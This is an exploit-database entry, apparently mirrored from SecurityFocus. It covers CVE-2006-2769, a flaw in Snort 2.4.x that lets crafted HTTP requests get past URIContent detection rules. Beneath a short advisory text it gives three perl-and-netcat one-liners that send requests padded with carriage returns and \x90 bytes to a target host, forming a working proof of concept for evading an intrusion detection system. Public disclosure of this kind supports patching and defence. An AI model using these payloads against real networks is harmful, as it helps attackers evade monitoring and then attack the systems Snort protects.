[] NeoSense
E X P L O I T S
title author type platform port cve id

Snort 2.4.x - URIContent Rules Detection Evasion

Author: Blake Hartstein
type: remote
platform: multiple
port: 
date_added: 2006-05-31 
date_updated: 2013-08-29 
verified: 1 
codes: CVE-2006-2769;OSVDB-25837 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/18200/info

Snort is reportedly prone to a vulnerability that may allow malicious packets to bypass detection.

A successful attack can allow attackers to bypass intrusion detection and to carry out attacks against computers protected by Snort.

This vulnerability affects Snort 2.4.4. Other versions may be vulnerable as well.

perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.